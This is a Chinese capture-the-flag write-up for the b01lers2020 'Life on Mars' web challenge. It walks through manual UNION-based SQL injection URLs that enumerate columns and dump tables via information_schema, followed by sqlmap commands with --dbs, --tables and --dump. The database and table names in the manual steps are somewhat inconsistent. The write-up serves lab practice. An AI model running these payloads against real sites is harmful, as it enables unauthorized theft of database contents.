[b01lers2020]Life on Mars1

打开题目页面如下

看了旁边的链接,也没有什么注入点,是正常的科普

利用burp suite抓包,发现传参

访问一下

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise

接下来进行sql注入

方法一:手工注入

判断字段

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise order by 2

这里url会编码故我们可以使用postman软件来进行测试

字段为2是正常回显,3是页面错误判断字段数为2

判断回显点

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select 1,2

爆出数据库名

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select version(),database()

爆出表名

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select 1,group_concat(column_name) from information_schema.columns where table_name='alien_code'

爆出字段

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select group_concat(name),group_concat(description) from code.alien_code

爆出字段内容

复制代码
http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise union select group_concat(id),group_concat(code) from alien_code.code

最后得到flag

方法二:sqlmap注入

复制代码
爆数据库名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise --dbs

爆表名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise --tables

爆字段名
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise -T alien_code --columns

爆字段内容
python sqlmap.py -u http://5edaec92-dd87-4fec-b0e3-501ff24d3650.node5.buuoj.cn:81/query?search=tharsis_rise -T alien_code -C id --dump
相关推荐
大熊程序猿12 分钟前
net8.0一键创建支持(Orm-Sqlite-MySql-SqlServer)
数据库·mysql·sqlite
hqxstudying2 小时前
Java异常处理
java·开发语言·安全·异常
liulilittle5 小时前
C++ TAP(基于任务的异步编程模式)
服务器·开发语言·网络·c++·分布式·任务·tap
guts°9 小时前
17-VRRP
网络·智能路由器
Jewel Q9 小时前
动态路由协议基础
网络·智能路由器
-SGlow-9 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
宇称不守恒4.010 小时前
2025暑期—06神经网络-常见网络2
网络·人工智能·神经网络
Dreams_l10 小时前
网络编程2(应用层协议,传输层协议)
运维·服务器·网络
明月56610 小时前
Oracle 误删数据恢复
数据库·oracle
数据与人工智能律师10 小时前
数字迷雾中的安全锚点:解码匿名化与假名化的法律边界与商业价值
大数据·网络·人工智能·云计算·区块链